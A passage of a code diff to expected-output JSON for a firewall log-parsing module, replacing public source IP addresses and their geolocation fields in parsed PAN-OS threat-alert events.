 "client.port": 80,
 "destination.address": "192.168.0.6",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -6582,7 +6277,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,65.55.5.231,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:32,81.2.69.143,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,\"ADSAdClient31.dll\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -6595,9 +6290,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 27437,
+ "log.offset": 27336,
 "network.application": "web-browsing",
- "network.community_id": "1:OSQCnxYE2CqKztyfnzJHya/llPw=",
+ "network.community_id": "1:vpvx2rrEII2Wtti+NqSoe98K6s4=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -6629,7 +6324,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.6",
- "65.55.5.231"
+ "81.2.69.143"
 ],
 "related.user": [
 "jordy"
@@ -6639,19 +6334,17 @@
 "server.port": 1064,
 "server.user.name": "jordy",
 "service.type": "panw",
- "source.address": "65.55.5.231",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Redmond",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 47.6722,
- "source.geo.location.lon": -122.1257,
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.name": "United States",
- "source.geo.region_iso_code": "US-WA",
- "source.geo.region_name": "Washington",
- "source.ip": "65.55.5.231",
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -6664,17 +6357,7 @@
 "client.port": 1048,
 "client.user.name": "jordy",
 "destination.address": "65.54.71.11",
- "destination.as.number": 8075,
- "destination.as.organization.name": "Microsoft Corporation",
- "destination.geo.city_name": "Los Angeles",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 34.0544,
- "destination.geo.location.lon": -118.244,
 "destination.geo.name": "United States",
- "destination.geo.region_iso_code": "US-CA",
- "destination.geo.region_name": "California",
 "destination.ip": "65.54.71.11",
 "destination.port": 80,
 "event.action": "data_match",
@@ -6699,7 +6382,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 27818,
+ "log.offset": 27717,
 "network.application": "web-browsing",
 "network.community_id": "1:MeB0cefg5kMN7f+LW+cirwH2nA8=",
 "network.direction": "inbound",
@@ -6755,7 +6438,7 @@
 },
 {
 "@timestamp": "2012-04-09T08:18:37.000-02:00",
- "client.ip": "74.125.239.17",
+ "client.ip": "89.160.20.156",
 "client.port": 80,
 "destination.address": "192.168.0.6",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -6771,7 +6454,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,74.125.239.17,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,89.160.20.156,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,\"csi\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -6783,9 +6466,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 28187,
+ "log.offset": 28086,
 "network.application": "web-browsing",
- "network.community_id": "1:iDmf9CnG+CdUuHWmwVsmhee3/Qs=",
+ "network.community_id": "1:lI0hgoESF7/v82QAbsIMoPxInGQ=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -6817,7 +6500,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.6",
- "74.125.239.17"
+ "89.160.20.156"
 ],
 "related.user": [
 "jordy"
@@ -6827,16 +6510,19 @@
 "server.port": 1071,
 "server.user.name": "jordy",
 "service.type": "panw",
- "source.address": "74.125.239.17",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.address": "89.160.20.156",
+ "source.as.number": 29518,
+ "source.as.organization.name": "Bredband2 AB",
+ "source.geo.city_name": "Link\u00f6ping",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "SE",
+ "source.geo.country_name": "Sweden",
+ "source.geo.location.lat": 58.4167,
+ "source.geo.location.lon": 15.6167,
 "source.geo.name": "United States",
- "source.ip": "74.125.239.17",
+ "source.geo.region_iso_code": "SE-E",
+ "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+ "source.ip": "89.160.20.156",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -6849,13 +6535,6 @@
 "client.port": 57502,
 "client.user.name": "picard",
 "destination.address": "208.85.40.48",
- "destination.as.number": 40428,
- "destination.as.organization.name": "Pandora Media, Inc",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "208.85.40.48",
 "destination.port": 80,
@@ -6881,7 +6560,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 28556,
+ "log.offset": 28455,
 "network.application": "pandora",
 "network.community_id": "1:c67I85z1uJV7VW6M9MR5Q8fjHQM=",
 "network.direction": "inbound",
@@ -6937,7 +6616,7 @@
 },
 {
 "@timestamp": "2012-04-09T08:58:18.000-02:00",
- "client.ip": "74.125.224.198",
+ "client.ip": "81.2.69.193",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -6953,7 +6632,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,74.125.224.198,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,81.2.69.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -6965,9 +6644,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 28944,
+ "log.offset": 28843,
 "network.application": "google-maps",
- "network.community_id": "1:w5GKumufuJCv3Gw8bvP3vTxap24=",
+ "network.community_id": "1:tsjbpnOPfE5+wHs/9MImDTjVjp8=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -6999,7 +6678,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "74.125.224.198"
+ "81.2.69.193"
 ],
 "related.user": [
 "picard"
@@ -7009,16 +6688,17 @@
 "server.port": 57876,
 "server.user.name": "picard",
 "service.type": "panw",
- "source.address": "74.125.224.198",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.address": "81.2.69.193",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.name": "United States",
- "source.ip": "74.125.224.198",
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.193",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7027,7 +6707,7 @@
 },
 {
 "@timestamp": "2012-04-09T08:22:27.000-02:00",
- "client.ip": "188.190.124.75",
+ "client.ip": "1.128.3.4",
 "client.port": 80,
 "destination.address": "192.168.0.6",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7043,7 +6723,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,188.190.124.75,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 08:22:27,1.128.3.4,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,\"about.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 4,
 "event.timezone": "-02:00",
@@ -7056,9 +6736,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "low",
- "log.offset": 29319,
+ "log.offset": 29215,
 "network.application": "web-browsing",
- "network.community_id": "1:a7oyQr47OdJP8ZnG9SCELvH8aco=",
+ "network.community_id": "1:a/X3iTqQa+TxkHJgrAy4Npfe+ZM=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -7089,7 +6769,7 @@
 "panw.panos.virtual_sys": "vsys1",
 "related.ip": [
 "0.0.0.0",
- "188.190.124.75",
+ "1.128.3.4",
 "192.168.0.6"
 ],
 "related.user": [
@@ -7100,19 +6780,11 @@
 "server.port": 1082,
 "server.user.name": "jordy",
 "service.type": "panw",
- "source.address": "188.190.124.75",
- "source.as.number": 12357,
- "source.as.organization.name": "Vodafone Spain",
- "source.geo.city_name": "Oliva",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 38.9197,
- "source.geo.location.lon": -0.1193,
+ "source.address": "1.128.3.4",
+ "source.as.number": 1221,
+ "source.as.organization.name": "Telstra Pty Ltd",
 "source.geo.name": "Ukraine",
- "source.geo.region_iso_code": "ES-V",
- "source.geo.region_name": "Valencia",
- "source.ip": "188.190.124.75",
+ "source.ip": "1.128.3.4",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7121,7 +6793,7 @@
 },
 {
 "@timestamp": "2012-04-09T07:11:43.000-02:00",
- "client.ip": "74.125.224.200",
+ "client.ip": "81.2.69.143",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7137,7 +6809,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -7149,9 +6821,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 29699,
+ "log.offset": 29590,
 "network.application": "google-maps",
- "network.community_id": "1:yyAK8WOE46l0/k8dVOECI6qa2zQ=",
+ "network.community_id": "1:Tc4KEUPBViPeku88f+PNN9tpeuc=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -7183,7 +6855,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "74.125.224.200"
+ "81.2.69.143"
 ],
 "related.user": [
 "picard"
@@ -7193,16 +6865,17 @@
 "server.port": 50986,
 "server.user.name": "picard",
 "service.type": "panw",
- "source.address": "74.125.224.200",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.name": "United States",
- "source.ip": "74.125.224.200",
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7211,7 +6884,7 @@
 },
 {
 "@timestamp": "2012-04-09T07:14:02.000-02:00",
- "client.ip": "74.125.239.3",
+ "client.ip": "216.160.83.61",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7227,7 +6900,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,216.160.83.61,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -7239,9 +6912,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 30074,
+ "log.offset": 29962,
 "network.application": "google-maps",
- "network.community_id": "1:15fj8zz0nlNi/Fnz8ibhS9Ihqdg=",
+ "network.community_id": "1:OjvHxM13sIYbWzkV4RtvyxXDyVM=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -7273,7 +6946,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "74.125.239.3"
+ "216.160.83.61"
 ],
 "related.user": [
 "picard"
@@ -7283,16 +6956,18 @@
 "server.port": 51716,
 "server.user.name": "picard",
 "service.type": "panw",
- "source.address": "74.125.239.3",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
+ "source.address": "216.160.83.61",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
 "source.geo.continent_name": "North America",
 "source.geo.country_iso_code": "US",
 "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
 "source.geo.name": "United States",
- "source.ip": "74.125.239.3",
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.61",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7301,7 +6976,7 @@
 },
 {
 "@timestamp": "2012-04-09T07:14:39.000-02:00",
- "client.ip": "74.125.239.3",
+ "client.ip": "216.160.83.61",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7317,7 +6992,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,74.125.239.3,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,216.160.83.61,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -7329,9 +7004,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 30447,
+ "log.offset": 30336,
 "network.application": "google-maps",
- "network.community_id": "1:fl9AVyrQeXPX/eoeKOy+6/UoR8M=",
+ "network.community_id": "1:kYzGF0Llye+Lln7ejrGG5SI6mW8=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -7363,7 +7038,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "74.125.239.3"
+ "216.160.83.61"
 ],
 "related.user": [
 "picard"
@@ -7373,16 +7048,18 @@
 "server.port": 52119,
 "server.user.name": "picard",
 "service.type": "panw",
- "source.address": "74.125.239.3",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
+ "source.address": "216.160.83.61",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
 "source.geo.continent_name": "North America",
 "source.geo.country_iso_code": "US",
 "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
 "source.geo.name": "United States",
- "source.ip": "74.125.239.3",
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.61",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7391,7 +7068,7 @@
 },
 {
 "@timestamp": "2012-04-09T07:16:03.000-02:00",
- "client.ip": "74.125.224.200",
+ "client.ip": "81.2.69.143",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7407,7 +7084,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,74.125.224.200,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,81.2.69.143,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -7419,9 +7096,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 30820,
+ "log.offset": 30710,
 "network.application": "google-maps",
- "network.community_id": "1:cHzYL+SCc86AntedL6fbRx+2wzE=",
+ "network.community_id": "1:AwfQlEV4j9qZjH7WG4q1qExon/o=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -7453,7 +7130,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "74.125.224.200"
+ "81.2.69.143"
 ],
 "related.user": [
 "picard"
@@ -7463,16 +7140,17 @@
 "server.port": 52411,
 "server.user.name": "picard",
 "service.type": "panw",
- "source.address": "74.125.224.200",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.address": "81.2.69.143",
+ "source.geo.city_name": "London",
+ "source.geo.continent_name": "Europe",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
 "source.geo.name": "United States",
- "source.ip": "74.125.224.200",
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.143",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7485,13 +7163,6 @@
 "client.port": 52366,
 "client.user.name": "picard",
 "destination.address": "74.125.239.6",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
 "destination.geo.name": "United States",
 "destination.ip": "74.125.239.6",
 "destination.port": 80,
@@ -7517,7 +7188,7 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 31195,
+ "log.offset": 31082,
 "network.application": "google-analytics",
 "network.community_id": "1:pRuFj5DzdmtFceU+OTawbYPhbJg=",
 "network.direction": "inbound",
@@ -7573,7 +7244,7 @@
 },
 {
 "@timestamp": "2012-04-09T07:25:04.000-02:00",
- "client.ip": "74.125.224.193",
+ "client.ip": "216.160.83.57",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7589,7 +7260,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,74.125.224.193,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,216.160.83.57,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,\"js\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -7601,9 +7272,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 31575,
+ "log.offset": 31462,
 "network.application": "google-maps",
- "network.community_id": "1:e27i7C6aBac+TOOJNFkXsvos7v0=",
+ "network.community_id": "1:PFB0Gj5/utCZj8v3vJPCiBrGY3Y=",
 "network.direction": "outbound",
 "network.transport": "tcp",
 "observer.egress.interface.name": "ethernet1/1",
@@ -7635,7 +7306,7 @@
 "related.ip": [
 "0.0.0.0",
 "192.168.0.2",
- "74.125.224.193"
+ "216.160.83.57"
 ],
 "related.user": [
 "picard"
@@ -7645,16 +7316,18 @@
 "server.port": 53026,
 "server.user.name": "picard",
 "service.type": "panw",
- "source.address": "74.125.224.193",
- "source.as.number": 15169,
- "source.as.organization.name": "Google LLC",
+ "source.address": "216.160.83.57",
+ "source.as.number": 209,
+ "source.geo.city_name": "Milton",
 "source.geo.continent_name": "North America",
 "source.geo.country_iso_code": "US",
 "source.geo.country_name": "United States",
- "source.geo.location.lat": 37.751,
- "source.geo.location.lon": -97.822,
+ "source.geo.location.lat": 47.2513,
+ "source.geo.location.lon": -122.3149,
 "source.geo.name": "United States",
- "source.ip": "74.125.224.193",
+ "source.geo.region_iso_code": "US-WA",
+ "source.geo.region_name": "Washington",
+ "source.ip": "216.160.83.57",
 "source.port": 80,
 "tags": [
 "forwarded",
@@ -7663,7 +7336,7 @@
 },
 {
 "@timestamp": "2012-04-09T07:36:04.000-02:00",
- "client.ip": "74.125.239.20",
+ "client.ip": "1.128.3.4",
 "client.port": 80,
 "destination.address": "192.168.0.2",
 "destination.geo.name": "192.168.0.0-192.168.255.255",
@@ -7679,7 +7352,7 @@
 "event.dataset": "panw.panos",
 "event.kind": "alert",
 "event.module": "panw",
- "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,74.125.239.20,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
+ "event.original": "Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,1.128.3.4,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,\"nav_logo107.png\",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,",
 "event.outcome": "success",
 "event.severity": 5,
 "event.timezone": "-02:00",
@@ -7692,9 +7365,9 @@
 "input.type": "log",
 "labels.captive_portal": true,
 "log.level": "informational",
- "log.offset": 31950,
+ "log.offset": 31836,
 "network.application": "web-browsing",
